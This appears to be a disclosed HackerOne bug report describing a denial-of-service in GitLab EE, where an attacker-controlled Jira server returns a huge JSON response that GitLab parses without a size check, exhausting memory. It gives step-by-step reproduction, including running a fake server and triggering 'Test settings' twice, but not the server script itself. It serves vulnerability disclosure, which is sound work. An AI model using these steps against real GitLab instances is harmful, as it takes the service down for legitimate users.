Gitlab DOS via integrating a malicious Jira-issue-tracker into a project
HackerOne report #2637997 by a92847865 on 2024-08-04, assigned to @greg:
Report
NOTE! Thanks for submitting a report! Please note that initial triage is handled by HackerOne staff. They are identified with a
HackerOne triagebadge and will escalate to the GitLab team any. Please replace all the (parenthesized) sections below with the pertinent details. Remember, the more detail you provide, the easier it is for us to triage and respond quickly, so be sure to take your time filling out the report!
Summary
You can integrate Jira as your project's external issue tracker container into Gitlab. When testing the integration, Gitlab server will connect to Jira server to fetch server information. Due to lacking of response size check in Gitlab::Jira::HttpClient.make_request method, an attacker-controlled Jira issue tracker server can send responses with large body (300MB JSON file) to Gitlab application. Then those responses are parsed by Jira::Resource::ServerInfo.all consuming GiBs of RAM. Triggering two requests (from Gitlab to malicious server) is enough to consume all available memory of a 1k-users self-managed Gitlab EE instance and make Gitlab instance unreachable for legitimate users.
Steps to reproduce
(Step-by-step guide to reproduce the issue, including:)
- Register two VMs: a
1k-users self-managed Gitlab EE instanceVM (8 vCPU, 16GB RAM) and anotherfake_serversmaller VM. - Install latest Gitlab EE on ``1k-users self-hosted Gitlab EE instance``` VM.
- Create a new project.
- SSH into and upload these files ( and ) to
fake_serverVM - Start
fake_serverat port 80:sudo nodejs fake_server.js - Open 2 tabs with the same below URL. You can find equivalent curl command using Chrome's Developer Tools and send 2 requests by curl also. It would be the way to automate this attack for larger instances.
http://[your_GL's_host_name]/[optional_group_name]/[project_name]/-/settings/integrations/jira/edit - In each tab, fill in necessary fields:
- Web URL:
http://[fake_server_IP] - Email or username, API token or password, Jira issue prefix: random strings
- Click "Test settings" button
- SSH into
1k-users self-hosted Gitlab instanceVM, run "htop" command. You should see that Gitlab consumes all available memory and the Gitlab instance becomes unavailable.
Impact
DOS: complete service outage to other users.
Examples
(If the bug is project related, please create an example project and export it using the project export feature)
(If you are using an older version of GitLab, this will also help determine whether the bug has been fixed in a more recent version)
(If the bug can be reproduced on GitLab.com without violating the Rules of Engagement as outlined in the program policy, please provide the full path to the project.)
What is the current bug behavior?
-
Gitlab::Jira::HttpClient.make_requestmethod doesn't check response's body size.
https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/jira/http_client.rb#L31-62 - Then the response parsing process is trigger by
def server_info
client_url.present? ? jira_request(API_ENDPOINTS[:server_info]) { client.ServerInfo.all.attrs } : nil
- Here is the definition of
client.ServerInfo.allmethod from https://github.com/sumoheavy/jira-ruby/blob/master/lib/jira/resource/serverinfo.rb
def self.all(client, options = {})
response = client.get(collection_path(client))
json = parse_json(response.body) # *parsing response*
new(client, { attrs: json }.merge(options))
end
What is the expected correct behavior?
Gitlab::Jira::HttpClient.make_request method should have a limit and check response's body size.
Relevant logs and/or screenshots
(Paste any relevant logs - please use code blocks (```) to format console output,
logs, and code as it's very hard to read otherwise.)
Output of checks
(If you are reporting a bug on GitLab.com, write: This bug happens on GitLab.com)
Results of GitLab environment info
(For installations with omnibus-gitlab package run and paste the output of:
sudo gitlab-rake gitlab:env:info)
(For installations from source run and paste the output of:
sudo -u git -H bundle exec rake gitlab:env:info RAILS_ENV=production)
System information
System: Ubuntu 20.04
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 3.1.5p253
Gem Version: 3.5.11
Bundler Version:2.5.11
Rake Version: 13.0.6
Redis Version: 7.0.15
Sidekiq Version:7.1.6
Go Version: unknown
GitLab information
Version: 17.2.1-ee
Revision: 88793996279
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 14.11
URL: http://34.16.168.95
HTTP Clone URL: http://34.16.168.95/some-group/some-project.git
SSH Clone URL: git@34.16.168.95:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 14.37.0
Repository storages:
- default: unix:/var/opt/gitlab/gitaly/gitaly.socket
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Gitaly
- default Address: unix:/var/opt/gitlab/gitaly/gitaly.socket
- default Version: 17.2.1
- default Git Version: 2.45.2
Impact
Attacker can take down a 1k-users Gitlab EE self-managed instance by testing a malicious Jira server (external issue tracker) in a project's settings. It would make the Gitlab EE instance unavailable to other users.
How To Reproduce
Please add reproducibility information to this section: